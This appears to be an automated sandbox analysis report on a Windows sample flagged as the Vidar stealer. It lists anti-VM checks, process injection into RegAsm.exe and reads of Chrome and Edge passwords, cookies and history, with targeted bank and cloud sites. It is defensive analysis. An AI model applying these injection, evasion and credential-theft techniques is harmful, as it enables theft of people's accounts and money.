Code function: 2_2_00418AFD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00418AFD

Source: sqls[1].dll.2.dr

Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA00C push ecx; ret	0_2_00FFA01F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A725 push ecx; ret	2_2_0041A738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B681BF9 push ecx; ret	2_2_1B824C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6810C8 push ecx; ret	2_2_1B883552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418AFD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-20409

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410ACD GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410BE0h

2_2_00410ACD

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100D5B1 FindFirstFileExW,	0_2_0100D5B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D2FF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D2FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C0F8 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A17A _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A17A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417295 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	2_2_00417295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A595 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B616 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040B616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004176DE _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004176DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416824 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00416824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AC07 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040AC07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416EF1 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00416EF1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00416C71 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

2_2_00416C71

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410C69 GetSystemInfo,wsprintfA,

2_2_00410C69

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: JEHIID.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: JEHIID.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: JEHIID.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: JEHIID.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: JEHIID.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: JEHIID.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: JEHIID.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: JEHIID.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: JEHIID.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: JEHIID.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: JEHIID.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: JEHIID.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: JEHIID.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: JEHIID.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: JEHIID.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegAsm.exe, 00000002.00000002.3326127639.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JEHIID.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: JEHIID.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA
Source: JEHIID.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: JEHIID.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_2-90944

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FFE423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FFE423

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418AFD

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100C44B mov eax, dword ptr fs:[00000030h]		0_2_0100C44B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010049AA mov ecx, dword ptr fs:[00000030h]		0_2_010049AA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_01010CFB GetProcessHeap,

0_2_01010CFB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFE423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FFE423
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA52A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FFA52A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA686 SetUnhandledExceptionFilter,	0_2_00FFA686
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA7C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FFA7C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A8CF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041A8CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F988 SetUnhandledExceptionFilter,	2_2_0041F988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041BDF7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041BDF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6842AF SetUnhandledExceptionFilter,	2_2_1B6842AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B682C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_1B682C8E

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FC018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_00FC018D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00411FA6 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_00411FA6

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DDC008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FFA215 cpuid

0_2_00FFA215

Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_01010135
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_010103D7
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_01007515
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_01010548
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_01010422
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_010104BD
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0101079B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_010109CA
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_010108C4
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_01007A3B
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_01010A99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00410ACD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_1B682112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_1B682112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_1B85FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_1B68298C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FFA424 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FFA424

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004109B3 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_004109B3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410A7A GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00410A7A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6FDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_1B6FDB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B725910 sqlite3_mprintf,sqlite3_bind_int64,	2_2_1B725910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7AD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1B7AD9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B701FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B701FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6FDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	2_2_1B6FDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B695C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_1B695C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B73D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B73D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7251D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B7251D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B719090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	2_2_1B719090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B75D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B75D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7255B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1B7255B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7AD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1B7AD4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7A14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1B7A14D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B8970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_1B6B8970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B694820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	2_2_1B694820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B0FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_1B6B0FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B764D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_1B764D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B8CB0 sqlite3_bind_zeroblob,	2_2_1B6B8CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6F8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	2_2_1B6F8200
